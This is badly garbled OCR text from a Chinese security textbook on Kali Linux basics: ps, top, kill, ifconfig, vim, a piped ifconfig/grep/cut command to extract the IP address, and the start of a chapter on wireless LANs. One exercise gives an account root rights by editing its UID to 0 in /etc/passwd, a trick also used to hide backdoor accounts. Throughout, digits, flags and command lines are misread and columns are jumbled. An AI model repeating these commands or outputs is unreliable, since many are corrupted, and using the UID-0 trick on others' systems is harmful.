缩 文 件 。 VSZ 占用 的 虚拟 记忆 体 大 小 
(2) .tar 格式 使 用 tar -cf 进行 打包 ， 使 《Rss 占用 的 记忆 体 大 小 
用 -xf 进行 解 包 。 终端 的 次 要 装置 号 码 (minor device 
(3) .tar.gz 格式 使 用 tar -zcf 打包 并 压 number of tty) 
缩 ， 使 用 -zxf 解压 缩 。 STAT 该 行程 的 状态 
(4) .zip 格式 使 用 zip 压缩 -r 压缩 目录 Dp 不 可 中 断 的 静止 
unzip 解压 缩 。 R 正在 执行 中 
(5) .bz2 格式 使 用 bzip2 进行 压缩 -k 下、 区 上 状 术 
保留 源 文 件 ，bunzip2 解压 缩 2 
(6) .tarbz2 答 邢 使 用 tar -cf 进行 打包 不 在 在 但 暂时 无 法 消除 
并 压缩 ， 使 用 -xjf 解压 。 
W 没有 足够 的 记忆 体 分 页 可 分 配 
< 高 优先 序 的 行程 
4.9 网 络 系统 操作 命令 ra 


任何 操作 系统 如 果 不 能 上 网 那么 使 用 1 有 记忆 体 分 页 分 配 并 锁 在 记忆 体内 
的 意义 将 会 大 打折 扣 ， 接 入 网 络 是 当前 操 (实时 系统 或 [AIO) 
作 系统 的 一 个 必要 任务 ， 因 此 掌握 基础 的 “> 一- 行程 开始 时 间 
网 络 操作 是 很 有 必要 的 。 TIME 执行 的 时 间 
COMMAND | 所 执行 的 指令 


Sir 4.9.1 ps - 
Ee 例如 : 使 用 ps 但 看 系统 进行 信息 ， 下 


i Kali Linux 系 统 中 的 ps 命令 用 于 显示 当前 进 图 为 执行 效果 ， 由 于 信息 量 比 较 大 ， 这 里 
程 (process) 的 状态 。 命 令 语法 格式 如 下 : 只 寄 去 了 部 分 信息 。 


ps [options] [--help] FootOkali: -AR ps dux 


JSER PID %CPU %MEMN VSsz RSS TTY STAT START TIME COMMAND 
从 参 en 
] ml em < {单位 KB) (单位 KB) 和 时间 
命令 中 选项 的 参数 介绍 见 下 表 。 root 本 909.9 6.2 196252 8624 ? 5S 21:37 6:64 /sbin/init 
命令 二 本 
表 PS 命 今 参 数 介 绍 ogt 4 6:0 .0 6 6 7 I< 21:37 6:69 sl 
root 6 0.0 6.6 9 0 ? I< 21:37 96:69 [kworker/ye:6H-K 
root B 69.6 6.9 0 9 ? I< 21:37 6:69 [mm_ percpu _wq] 
有 及 是 .8 : | 
选 项 含 义 root 19 66 028 a 
root 11 6.6 6.6 日 9 ? I 21:37 gg:69 [recu_bh] 
和 和 
A 列 出 所 有 的 行程 Ct 14 66 9.9 0 9 ? ss 21:37 6:69 ] 
root 15 0.0 6.6 0 0 ? 5 21:37 6:69 [cpuhp/1] | 
-W 显示 加 宽 可 以 显示 较 多 的 资讯 四 四 一 一 YY 
Kali Linux 系 统 中 时 刻 运 行 着 许多 进 
-au 显示 较 详 细 的 资讯 A 、 
程 ， 如 果 能 够 合理 地 管理 它们 ， 则 可 以 优 
-aUX 显示 所 有 包含 其 他 使 用 者 的 行 2 si 
nll ls 化 系统 的 性 能 。 在 Kali Linux 系 统 中 ， 有 5 种 


输出 格式 :USER PID %CPU %MEM 常见 的 进程 状态 ， 分 别 为 运行 、 中 断 、 不 


au(x) RSS TTY STAT START TIME 可 中 断 、 便 死 与 停止 ， 其 各 自 含义 如 下 。 
- e R (运行 ) : 进程 正在 运行 或 在 运 
USER 行程 拥有 者 
行 队列 中 等 等。 
PID pid 
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S (中 断 ) : 进程 处 于 休眠 中 ， 当 某 
个 条 件 形 成 后 或 者 接收 到 信号 时 ， 
则 脱离 该 状态 。 

e D (不 可 中 断 ) : 进程 不 响应 系统 
异步 信号 ， 即 便 用 kill 命 令 也 不 能 将 
其 中 断 。 

e Z( 僵 死 ) : 进程 已 经 终止 ， 但 进 
程 描述 依然 存在 ， 直 到 父 进程 调用 
wait4() 系 统 函数 后 将 进程 释放 。 

e T〈 停 止 》: 进程 收 到 停止 信号 后 停 

止 运行 。 


4.9.2 top 


Kali Linux 系 统 中 的 top 命 令 用 于 实时 
显示 进程 的 动态 ， 其 使 用 权限 为 所 有 使 用 
者 。 命 令 语法 格式 如 下 : 


top [-] [ld delay] [ql] [cj [Ss] [s] 


[i [ny [Lb] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 top 命 令 参数 介绍 
含 义 
改变 显示 的 更 新 速度 ， 或 是 在 交谈 式 指 


令 列 (interactive command) 按 s 


没有 任何 延迟 的 显示 速度 ， 如 果 使 用 者 
-q 是 有 管理 员 的 权限 ， 则 top 将 会 以 最 高 的 
优先 序 执行 


十 只 显示 执行 档 的 名 称 ， 另 一 种 是 显示 完 
整 的 路 径 与 名 称 


累积 模式 ， 会 将 己 完 成 或 消失 的 子 行程 


选 项 


-d 


下 (dead child process) 的 CPU time 累 积 起 来 

、 安全 模式 ， 将 交谈 式 指令 取消 , 避免 潜在 
的 危机 

不 显示 任何 闲置 (idle) 或 无 用 (zombie) 


的 行程 
-1 更 新 的 次 数 ， 完 成 后 将 会 退出 top 


批 次 档 模式 ， 配 合 n 选 项 一 起 使 用 ， 可 以 
用 来 将 top 的 结果 输出 到 档案 内 


例如 : 使 用 top 命 令 查 看 系统 进程 信息 ， 
下 图 为 执行 效果 ， 这 里 只 截取 了 部 分 信息 。 


-b 


ftop - 66:66:46 up 2:23, 1 user, Toad a ge: 6.19, €.67, 6.61 
ITasks: 199 total, 1 running, 198 sleeping © stopped, 8 工 ie 
PCpu[s): 0.3 us, 08.3 sy, 0.8 ni, 99.4 id 0.0 wa, .8 hi, 起 ;SS * 自 st 
MiB Mem : 3943.1 total, 2382.2 free, 963 .3 used, 657.6 buff/cache 
MiB Swap: 2045.8 total, 2845 .日 f 可 .6 Used. 2791.1 avail Mem 
pI SER R NI YIR REE SHR < | 1ENM TIME+ COM 
349 root 208 8 286364 51612 33566 5 6.3 1.3 6:67.31 Xorg 
1217 root 29 8 36579898 266388 879125 6.3 6.6 1:54.32 gnom [a 
1937 root 29 8 9 9 I 6.3 6.6 6:16.77 kworker/u64:9-phy9 
1994 root 296 8 466124 44416 32648 5 6.3 1.1 6:63.39 gnome-terminal- 
2423 root 296 8 OI 6.3 6.6 696:61.34 kworker/u64:2-phye 
1 root 29 © 198252 8624 6536 5 6.6 6.2 6:64.22 syst 
2 root 29 8 9 9 05 6.6 6.6 6:696.93 kthreadd 
3 root 8 -20 9 9 OI .0 6.6 0:80.80 rcu 9 
4 root 8 -29 9 9 I 6.6 08.0 0:60.68 rcuj par gp 


行 中 的 程序 或 工作 。 命 令 语法 格式 如 下 : 


kill [选项 ] [进程 PID] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 ”kill 命 令 参数 介绍 
含义 


各 不 加 信号 的 编号 选项 ， 则 使 用 
“-1” 选 项 会 列 出 全 部 的 信号 名 称 


当 处 理 当 前 进程 时 ， 不 限制 命令 名 
和 进程 号 的 对 应 关系 


指定 Kill 命令 只 打印 相关 进程 的 进程 
二 号 ， 而 不 发 送 任何 信号 


-S 指定 发 送信 号 
-U 指定 用 户 
例如 : 使 用 -1] 选 项 列 出 所 有 信息 编号 ， 
下 图 为 命令 执行 效果 。 


rootGkaL :~ 大 kiLlL -[ 


选 项 


-1 < 信息 编号 > 


-d 


1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP 

6) SIGABRT 了) SIGBUS 8) 5IGFPE 9) SIGKILL 19) SIGUS5R]1 
N11) SIGSEGY 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM 
16); SIGSTKFLT 17) SIGCHLD 18) SIGCONT 19) SIGSTOP 28)】 SIGTSTP 
21) SIGTTIN 22) SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ 
Rp6) SIGVTALRM 27) SIGPROF 28) SIGWINCH 29) SIGIO 30) SIGPWR 
Bl1) SIGSYS 34) SIGRTMIN 35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3 
B8) SIGRTMIN+4 39) SIGRIMIN+5S 40) SIGRTMIN+6 41) SIGRTMIN+7 42) SIGRTMIN+8 
43) SIGRTMIN+9 44) SIGRTMIN+160 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13 
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-13 


53) SIGRTMAX-11 54) SIGRTMAX-19 55) SIGRTMAX-9 55) SIGRTMAX-8 57) SIGRTMAX-7 
58) SIGRTMAX-6 59) SIGRIMAX-:5 68) SIGRTMAX-4 61) SIGRTMAX-3 62) SIGRTMAX-2 
6B3) SIGRTMAX-1 64) SIGRTMAX 


4.9.4 ifconfig 


获取 网 卡 配 置 与 网 络 状 态 等 信息 ， 使 用 if- 
config 命 令 来 查看 本 机 当前 的 网 卡 配 置 与 
网 络 状 态 等 信息 时 ， 其 实 主 要 查看 的 就 是 
网 卡 名 称 、inet 参 数 后 面 的 IP 地 址 、ether 
参数 后 面 的 网 卡 物理 地 址 (又 称 为 MAC 
地 址 ) ， 以 及 RX、TX 的 接收 数据 包 与 发 
送 数据 包 的 个 数 及 累计 流量 。 

ifconfg 命 令 语法 格式 如 下 : 
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命令 中 选项 的 参数 介绍 见 下 表 。 


选项 
add< 地 址 > 
del< 地 址 > 
down 
<hw< 网 络 设备 类 型 >< 硬 件 地 址 > 
io addr<1/O 地 址 > 
irq<IRQ 地 址 > 
media< 网 络 媒介 类 型 > 
mem start< 内 存 地 址 > 
metric< 数 目 > 
mtu< 字 节 > 
netmask< 子 网 掩 码 > 
tunnel< 地 址 > 
up 
-broadcast< 地 址 > 
-pointopoint< 地 址 > 
-promisc 
[PP 地 址 ] 
[网 络 设备 ] 


表 ifconfig 命令 参数 介绍 
含义 

设置 网 络 设备 IPV6 的 人 P 地 址 
删除 网 络 设备 IPv6 的 IP 地 址 
关闭 指定 的 网 络 设备 
设置 网 络 设备 的 类 型 与 硬件 地 址 
设置 网 络 设 备 的 /O 地 址 
设置 网 络 设备 的 IRQ 
设置 网 络 设备 的 媒介 类 型 
设置 网 络 设备 在 主 内 存 所 占用 的 起 始 地 址 
指定 在 计算 数据 包 的 转送 次 数 时 ， 所 要 加 上 的 数目 
设置 网 络 设备 的 MTU 
设置 网 络 设备 的 子 网 掩 码 
建立 IPv4 与 IPv6 之 间 的 隧道 通信 地 址 
启动 指定 的 网 络 设备 
将 要 送 往 指 定 地 址 的 数据 包 当 成 广播 数据 包 来 处 理 
与 指定 地 址 的 网 络 设备 建立 直接 连 线 ， 此 模式 具有 保密 功能 
关闭 或 启动 指定 网 络 设 备 的 promiscuous 模 式 
指定 网 络 设备 的 人 P 地 址 
指定 网 络 设备 的 名 称 


例如 : 使 用 ifconfig 查 看 网 卡 信息 ， 下 图 为 运行 效果 。 


root@Kkali:~# Ifconfig 

ethO: flags=4163<UP,BROADCAST ,RUNNING ,MULTICAST> mtu 1509 
jnet 192.168.157.132 netmask 255.255.255.0 broadcast 192.168.157.255 
inet6 fe86::20c:29ff:fe39:f29c prefixlen 64 scopeid 0x20=<Link> 
ether 00:0c:29:39:f2:9c txqueuelen 1000 [Ethernet) 

RX packets 7258 bytes 5674882 (5.4 MiB) 

RX errors 9 dropped 6 overruns 0 frame 0 

TX packets 1960 bytes 135449 [132.2 KiB) 

TX errors 6 dropped 6 overruns ©@ carrijier 8 collisions 0 


lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 

inet 127.6.0.1 netmask 255.9.0.6 

::1 prefixlen 128 scopeid 9x19<host> 

loop txqueuelen 19868@ (Local Loopback) 

RX packets 36 bytes 1992 (1.9 Ki6) 

RX errors © dropped 6 overruns © frame 0 

TX packets 36 bytes 1992 (1.9 KiB) 

TX errors 9 dropped 6 overruns 9 carrier 0 collisions 0 


inet6 


nlanG: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtuU 1590 

inet 192.168.0.114 netmask 255.255.255.0 broadcast 192.168.0.255 
inet6 fe80::814f:d52c:e332:2ebl1 prefixlen 64 scopeid 0x20<Link> 
ether e8:4e:06:28:ae:;46 txqueuelen 19090 [Ethernet) 

RX packets 2325 bytes 13749D (134.1 KiB) 

RX errors © dropped 6 overruns © frame 0 

TX packets 104 Dbytes 8340 (8.1 KiB) 

TX errors © dropped 6 overruns 6 carrier 0 collisions 0 
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多 提示 : 

e eth0 代 表 以 太 网 卡 如 果 有 多 块 网 
卡 ， 会 一 次 为 eth0，eth1，eth2 这 样 
排列 。 

@ lo 代表 本 地 回环 网 卡 ， 每 个 系统 都 
有 一 个 唯一 的 本 地 回环 。 

@ wlan0 代 表 无 线 网 卡 ， 如 果 有 多 块 
无 线 网 卡 同 以 太 网 卡 一 样 依次 排列 


为 wlan0，wlanl 这 样 。 


4.10 Kali Linux 系 统 的 文本 编 
辑 需 


在 Kali Linux 系 统 中 ， 目 前 使 用 比较 
多 的 是 vim 编 辑 器 ，vim 具 有 程序 编辑 的 能 
力 ， 可 以 主动 地 以 字体 颜色 辨别 语法 的 正 
确 性 ， 方 便 程序 设计 。 


4.10.1 认识 vim 文 本 编辑 器 


vi 编辑 器 是 所 有 Unix 及 Kali Linux 系 统 
下 标准 的 编辑 器 ， 它 相当 于 Windows 系 统 中 
的 记事 ， 它 的 强大 不 逊色 于 任何 最 新 的 文 
本 编辑 器 。 它 是 使 用 Kali Linux 系 统 中 不 能 
缺少 的 工具 。 对 于 Unix 及 Kali Linux 系 统 的 
任何 版 本 ，vi 编 辑 器 是 完全 相同 的 ， 因 此 熟 
练 掌握 该 编辑 器 是 非常 有 好 处 的 。 

vim 编 辑 器 可 以 当 作 vi 编辑 器 的 升级 版 
本 ， 它 可 以 用 多 种 颜色 的 方式 来 显示 一 些 
特殊 的 信息 ， 依 据 文件 扩展 名 或 者 是 文件 
内 的 开头 信息 ， 判 断 该 文件 的 内 容 从 而 自 
动 的 执行 该 程序 的 语法 判断 ， 再 以 颜色 来 
显示 程序 代码 与 一 般 信 息 。 并 且 它 加 入 了 
很 多 额外 的 功能 ， 例 如 支持 正则 表达 式 的 
搜索 、 多 文件 编辑 、 块 复制 ， 等 等 。 


4.10.2 vim 的 三 种 模式 


vim 有 三 种 模式 ， 分 别 是 命令 模式 、 插 
入 模式 、 编 辑 模 式 ， 如 下 图 所 示 。 


熟悉 无 线 网 络 安 全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


进入 退出 


输入 : wq 


命令 以 回 车 


输入 iao og 
结束 运行 


vim 三 种 模式 的 功能 介绍 如 下 : 

e 命令 模式 (默认 ) : 刚 进入 vim 的 时 
候 ， 默 认 便 是 命令 模式 ， 可 以 复制 
行 ， 删 除 行 等 。 

e 插入 模式 : 可 以 输入 内 容 。 

e 编辑 模式 : 在 最 下 边 出 现 “: 


便 进入 了 编辑 模式 ， 除 进行 编辑 外 苹 喇 站 


还 可 以 输入 诸多 管理 员 命令 。 
vim 三 个 模式 之 间 可 以 目 由 切换 ， 其 
中 ， 命 令 模 式 可 以 通过 下 面 这 些 快捷 键 切 


换 到 插入 模式 : 

e i: 在 当前 光标 所 在 字符 的 前 面 ， 转 
为 插入 模式 。 

e I: 在 当前 光标 所 在 行 的 行 首 转 换 为 
插入 模式 。 

e a: 在 当前 光标 所 在 字符 的 后 面 ， 转 
为 插入 模式 。 

e A: 在 光标 所 在 行 的 行 尾 ， 转 换 为 
插入 模式 。 


。 o: 在 当前 光标 所 在 行 的 下 方 ， 新 建 
一 行 ， 并 转 为 插入 模式 。 
。 0: 在 当前 光标 所 在 行 的 上 方 ， 新 
建 一 行 ， 并 转 为 插入 模式 。 
在 插入 模式 下 ， 可 以 通过 按 下 Esc 键 
切换 为 命令 模式 ， 在 命令 模式 下 ， 输 入 
“: ”可 切换 为 编辑 模式 。 


4.10.3 ”使 用 vim 打 开 文 件 


使 用 vim 打 开 文 件 的 方法 主要 有 以 下 几 
种 ， 下 面 分 别 进行 介绍 : 

(1) vim /path/to/somefile 。vim 后 跟 文 
件 路 径 及 文件 名 ， 如 果 文 件 存 在 ， 则 打开 
编辑 文件 窗口 ， 如 果 文 件 不 存在 ， 则 创建 
文件 。 
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Re 


二 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


(2) vim +#。 打 开 文 件 ， 并 定位 到 第 # 
行 ，# 代表 数字 。 

例如 : 输入 vim +3 /ect/flas.ini 命 令 ， 如 
下 图 所 示 。 


儿 Show (or not]) action 0TTSeiS In disassembly 

9: no offsets 
- 1: relative offsets from the start of action block 
此 2: absolute offsets from the start of SWF 
showoffset = 9 
央 9: Show offsets above jin decimal form, 1: 


(3) vim +。 打 开 文件 ， 定 位 到 最 后 
i 

例如 : 
下 图 所 示 。 


Tlatest: IT set to TLlabrowser, calls The browser 5TEer Updafte 
laplayer = C:\PROGRA~1\FLASHM~1\PLAYERS\SAFLASHPLAYER, EXE 
Labrowser = C:\PROGRA~1\INTERN~1\IEXPLORE .EXE 
latest = flabrowser 
'fetc/flasm.ini" 45L, 1745C 45,1 夺 端 


(4) vim +/PATTERN。 打 开 文 件 ， 定 位 
到 第 一 次 被 PATTERN 匹配 到 的 行 的 行 首 。 

例如 : 输入 vim +/fla /etc/flasm.ini 命 
令 ， 如 下 图 所 示 。 


these options ConhftroU what happens when FUasm 15 caltled Trom FLUash IDE| 
Flash 5 and Flash MX only, see "Embedding Flasm code” in flasm.html 

上 岂 flaplayer: path to flash player 

上 Eflabrowser: path to flash browser 

FF on windows, path should contain no spaces, therefore DUS format 
flatest: if set to flaplayer, calls the player after update 

片 flatest: if set to flabrowser, calls the browser after Update 

flaplayer = C:\PROGRA~1\FLASHM~1\PLAYERS\SAFLASHPLAYER .EXE 

flabrowser = C:\PROGRA~1\INTERN~1\IEXPLORE .EXE 

flatest = flabrowser 


in hexadecimal form 


输入 vim + /etc/flasm.ini 命 令 ， 如 


37,1 许 端 


实战 演练 


实战 演练 1 一 一 创建 普通 账 尸 提升 管理 权 
限 


4.11 


给 Kali Linux 操 作 系 统 创建 一 个 账户 ， 
并 修改 该 账号 为 管理 员 权 限 。 


使 用 adduser 命 令 添 加 一 个 test001 的 账 
与 ， 如 下 图 所 示 。 


root@Kkali: /home/test# adduser Ttest66I 
Adding user ‘testQ01' 
Adding new group test001' (1001) 
Adding new user ‘test001' (19900) with group “ testg91， 
Creating home directory ‘/hone/test001' 
Copying files from /etc/skel' 
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully 
Changing the user information for test001 
Enter the new value, or press ENTER for the default 
Full Name []: 
Room Number []: 
Work Phone [1]: 
Home Phone []: 
Other []: 
Is the information correct? [Y/n] y 
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使 用 su 命令 切换 到 test001 账 户 ， 执 行 
useradd 命 令 ， 发 现 没有 权限 ， 如 下 图 所 示 。 


test001l@kali:/home/test$ useradd test002 

useradd: Permission denied. 

useradd: cannot lock /etc/passwd; try again later. 
testo01@kali:/home/test$ 卜 


(名 注意: 管理 员 账 号 使 用 # 作 为 命令 提示 


使 用 Vi 打开 /etc/passwd 文 件 ， 可 以 看 
到 root 账 号 的 用 户 ID 为 0 组 ID 也 为 0， 在 文件 
的 末尾 是 新 加 账户 test001, 用 户 ID1000， 如 
下 图 所 示 。 


File Edit View Search Terminzl Help 
root:x:g9:9:root:/root:/bin/bash 

daemon:x:1:1:daemon: /usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
SYyS5:X:3:3:Sys:/dev:/usr/sbin/nologin 

sync:X:4:65534:sync: /bin:/bin/sync 

game5s:x:5:60:games: /usr/games:/yusr/sbin/nologin 
man:x:6:12:man: /var/cache/man: /usr/sbin/nologin 
beef-xss:x:132:141::/var/lib/beef-xss:/usr/sbin/nologin 
Debian-gdm:x:133:142:Gnome Display Manager:/var/lib/,gdm3:/bin/false 
systemd-coredump:Xx:998:998:systemd Core Dumper:/:/sbin/nologin 
Debian- snmp:x:117:122::/var/lib/snmp:/bin/false 
test801:x:1000:1801:,,,:/home/test801: /bin/bash 


修改 test001 账 户 ID 为 0， 再 次 切换 账 
户 发 现 test001 已 经 为 管理 员 ， 如 下 图 所 示 。 


vahi:x:128:136:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin 
ulse:x:129:137:PuUlseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin 
radis:x:;138;139;;/var/lib/dradis;/usr/sbin/nologin 

ing-phisher:x:131:148: :/var/lib/king-phisher:/usr/sbin/nologin 
eef-xss:X:132:141::/var/lib/beef-xss:/usr/sbin/nologin 
ebian-gdm:x:133:142:Gnome Display Manager;/var/lib/gdm3:/bin/false 
ystemd-coredump:x:998:998:systemd Core Dumper:/:/sbin/nologin 
ebian-snmp:x:117:122::/var/lib/snmp: /bin/false 
est001:x:0:0;:,,,:/home/test981: /bin/bash 


再 次 从 root 账 户 切 换 到 test001 账 户 ， 
此 时 test001 已 经 具有 管理 员 权 限 ， 如 下 图 
所 示 。 


oot@kali: /home/test# su test001 
oot@kali: /home/test# whoami 
root 

ootQkalLi:/home/test# 国 


实战 演练 2 一 一 通过 命令 获取 到 本 机 IP 
地 址 


通过 命令 获取 到 本 地 IP 地 址 可 以 通过 
以 下 几 个 步 又 : 


使 用 ifconfig 命 令 查 看 本 机 网 卡 及 IP 地 
址 ， 如 下 图 所 示 。 


Footekali:-# iTconTig 

Pthe: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu i1589 
inet 192.168.5.139 netmask 255.255.255.9 broadcast 192.168.5.259 
inet6 fe80: :29c:29ff:fe7f:39f2 prefixlen 64 scopeid Bx20<lLink> 
ether 8:0c:29:7f:39:f2 txqueuelen 10609 (Ethernet) 

RX packets 3117 bytes 232891 (227.4 KiB) 

RX errors B dropped © overruns 8 frame 6 

TX packets 478 bytes 42265 (41.2 KiB) 

TX errors 8 dropped 9 overruns 8 carrier 9 collisions 9 


ho: fLags=73<UP ,LODPBACK ,RUNNING> mtu 65536 

inet 127.0.6.1 netmask 255.6.9.8 

inet6 ;;1 prefixlen 126 5copeid 0x1L0<host> 

loop txqueuelen 1966 (Local Loopback) 

RX packets 32 bytes 1836 (1.7 KiB) 

RX errors 8 dropped 9 overruns 8 frame 9 

TX packets 32 bytes 1836 (1.7 KiB) 

TX errors 8 dropped 9 overruns B carrier 9 collisions 9 
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使 用 ifconfig eth0 命 令 过 滤 掉 本 地 回 
环 地 址 ， 只 显示 出 eth0 外 网 IP 地 址 ， 如 下 图 
所 示 。 


root@kali:~# ifconfig etho 

Eth@: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 15066 
inet 192.168.5.130 netmask 255.255.255.0 broadcast 192.168.5.253 
inet6 fe89::28C:29ff'fe7f:3912 prefixlen 64 scopeid 8x2g<link> 
ether 00:0c:29:7f:39:1f2 txqueuelen 10096 (Ethernet) 

RX packets 3206 bytes 238549 (232.9 KiB) 

RX errors 0 dropped © overruns 0 frame 6 

TX packets 478 bytes 42835 (41.8 KiB) 

TX errors 9 dropped 6 overruns © carrier © collisions @ 


使 用 ifconfig eth0|grep"inet" 命 令 ， 过 
滤 出 包含 有 inet 字 段 的 内 容 ， 如 下 图 所 示 。 


net ifconfig ethe|grep "jinet" 


inet 192.168.5.130 netmask 255.255.255.0 broadcast 192.168.5.255 
inet6 fe80:;:;20c:;29ff:;fe7f:39f2 prefixlen 64 scopeid 6x20<Link> 


使 用 ifconfig eth0lgrep "inet" | cut -d 
- sd -人 2 命令 ， 过 滤 出 inet 字 上段 第 一 行 ， 如 
下 图 所 示 。 


root@kali:~# ifconfig eth961grep "inet" | cut -d ":" 


使 用 ifconfig ethO|grep "inet" | cut -d ":" 
-人 2 | cut -d "t" - 亿 命 令 过 滤 掉 inet 字 段 ， 如 下 
图 所 示 。 


rootEkali:~# iTconTig etholgrep "inet™ | cut -dd ";:™ -TZ | cut -9 "tt -TZ 
I Cr | | 


使 用 ifconfig eth0lgrep "inet"|cut -d":" 
-f2|cut -d "t" -f 2|cut -d "n" -fl 人 命令， 过滤 掉 
后 n 字 符 后 面 的 内 容 ， 获 取 到 完整 的 本 机 了 
地 址 ， 如 下 图 所 示 。 


熟悉 无 线 网 络 安 全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


root@kali:-~# ifconfig ethg[grep “inet"[cut -d":" -f2[cut -d "t" -f 2| 
euUG = nl 
192.168.5.130 


小 试 身 手 


练习 1: 使 用 cd 命令 与 1s 命 令 切换 目录 
并 查看 目录 中 的 内 容 ， 熟 悉 各 个 目录 中 和 存 
放 哪 些 文件 。 

练习 2: 使 用 文件 查看 命令 检查 日 志 
信息 。 

练习 3: 试 着 使 用 文件 搜索 命令 查找 需 
要 的 文件 位 置 。 

练习 4: 熟练 使 用 账户 管理 命令 ， 学 会 
如 何 添 加 及 删除 账户 。 

练习 5: 试看 使 用 文件 解压 缩 命 令 ， 创 
建 压缩 文件 并 解压 ， 对 比 不 同 解压 缩 命 令 
的 区 别 。 

练习 6: 使 用 系统 操作 命令 查看 系统 
进程 。 

练习 7: 熟练 使 用 vi/vim 编 辑 器 ， 学 会 
打开 文件 快速 查找 、 人 修改、 保存 文件 。 
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第 5 章 组 建 无 线 安 全 网 络 


在 无 线 局 域 网 WLAN 发 明之 前 ， 人 们 要 想 通过 网 络 进行 联络 和 通信 ， 人 必须 先 用 网 线 组 
建 一 个 有 线 网 络 。 不 过 ， 这 种 有 线 网 络 无 论 组 建 、 拆 装 还 是 在 原 有 基础 上 进行 重新 布局 和 


改建 ， 都 非常 困难 ， 且 成 本 和 代价 也 非常 高 ， 


5.1 认识 无 线 局 域 网 


无 线 局 域 网 是 通过 无 线 通信 技术 进行 
组 网 的 一 个 结合 产物 ， 它 采用 无 线 电 波 、 
红外 线 或 激光 ， 通 过 无 线 通信 传输 媒介 代 
蔡 传 统 网 线 ， 构 成 传统 无 线 局 域 网 的 功 
能 ， 能 够 使 用 户 随 时 、 随 地 进行 上 网 。 


8 下 5.1.1 无线 局 域 网 的 优点 


Es 与 传统 有 线 网 络 相 比 ， 无 线 网 络 具 有 
ai 如 下 优点 : 
(1) 灵活 性 。 在 有 线 网 络 中 ， 网 络 设 
“" 备 的 安放 位 置 受到 网 络 位 置 的 限制 ， 而 无 
线 网 络 则 没有 ， 只 要 在 信号 覆盖 范围 内 ， 
都 可 以 接 入 网 络 。 

(2) 移动 性 。 无 线 网 络 的 最 大 优点 在 
于 它 的 移动 性 ， 接 入 的 用 户 可 以 在 覆盖 范 
围 内 随意 移动 ， 且 还 能 保持 网 络 的 连接 。 

(3) 方便 安装 。 无 线 网 络 可 以 最 大 程 
度 地 减少 网 络 布线 ， 一 般 只 须 安装 一 个 或 
多 个 接 入 点 设备 ， 这 样 便 可 以 建立 起 一 个 
覆盖 面 广 的 网 络 区 域 。 

(4) 方便 规划 和 调整 。 对 于 有 线 网 络 
而 言 ， 办 公 地 点 或 网 络 拓扑 的 改变 通常 需 


全 (5) 故障 定位 容易 。 有 线 网 络 一 旦 出 现 

物理 故障 ， 尤 其 是 由 于 线路 中 断 或 线路 不 
民 造 成 的 网 络 故 障 ， 往 往 很 难 查 找 原 因 ， 
并 且 线 路 检修 也 需要 付出 很 大 的 代价 ， 无 


于 是 无 线 组 网 方式 应 运 而 生 。 


线 网 络 则 不 同 ， 故 障 容易 定位 ， 定 位 后 更 
换 故 障 设备 即 可 恢复 网 络 。 

(6) 易于 扩展 。 无 线 网 络 有 多 种 配置 
方式 ， 可 以 很 快 从 只 有 几 个 用 户 的 小 型 局 
域 网 扩展 到 上 千 用 户 的 大 型 网 络 ， 并 且 还 
有 节点 间 漫 游 的 特性 ， 这 些 是 有 线 网 络 所 
不 能 实现 的 。 


5.1.2 无 线 局 域 网 的 正点 


无 线 网 络 的 缺点 主要 体现 在 性 能 、 速 率 
与 安全 性 三 个 方面 ， 下 面 进 行 详细 介绍 : 

(1) 性 能 。 无 线 网 络 是 依靠 无 线 电波 进 
行 传输 的 ， 因 此 无 线 电波 受到 遮挡 或 者 其 
他 电波 干扰 都 可 能 阻碍 电磁 波 传输 ， 受 到 
这 些 外 因 影 响 会 直接 导致 网 络 性 能 降低 。 

(2) 速率 。 无 线 信 道 的 传输 速率 与 有 
线 信道 相 比 要 低 得 多 ， 虽 然 无 线 网 络 还 在 
不 断 的 发 展 ， 目 前 已 经 能 达到 最 快 500Mb/s 
的 传输 速率 ， 但 是 与 有 线 网 络 的 千 兆 传输 
速率 相 比 还 是 有 差距 的 。 

(3) 安全 性 。 由 于 无 线 传输 的 特性 导 
致 无 线 传 输 是 发 散 的 ， 不 要 求 建 立 物 理 连 
接 通道 ， 因 此 从 理论 上 讲 ， 很 容易 被 监听 
造成 信息 泄露 。 


5.1.3 ”无线 局 域 网 的 组 网 模型 


无 线 局 域 网 有 其 方便 灵活 的 特性 ， 当 
然 它 也 有 自己 的 基本 组 网 模型 ， 如 下 图 所 
示 。 该 组 网 模型 的 组 成 元 件 包括 站 点 、 接 
入 扩 、 无 线 介 质 、 分 布 式 系统 等 。 


接 入 点 无 线 介 质 
EY 


(1) 站 点 。 配 置 网 络 的 目的 ， 是 为 了 
在 站 点 之 间 传 送 数据 。 所 谓 站 点 ， 是 指 配 
备 无 线 网 络 接口 的 计算 设备 ， 即 带 有 无 线 
网 卡 的 通信 设备 ， 如 笔记 本 计算 机 、 手 机 、 
iPad 等 无 线 设 备 。 

(2) 接 入 点 。 无 线 网 络 所 使 用 的 帧 必 
须 经 过 转换 ， 才 能 被 传递 至 其 他 不 同类 型 
的 无 线 设备 。 有 具备 无 线 至 有 线 桥 接 功 能 
的 设备 称 为 接 入 点 《简称 AP) ， 如 无 线 局 
域 网 中 的 无 线路 由 器 ， 就 是 一 个 简单 的 接 
入 凡 。 
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网 络 产品 之 间 的 互通 性 。WiFi 联 盟 成 立 于 
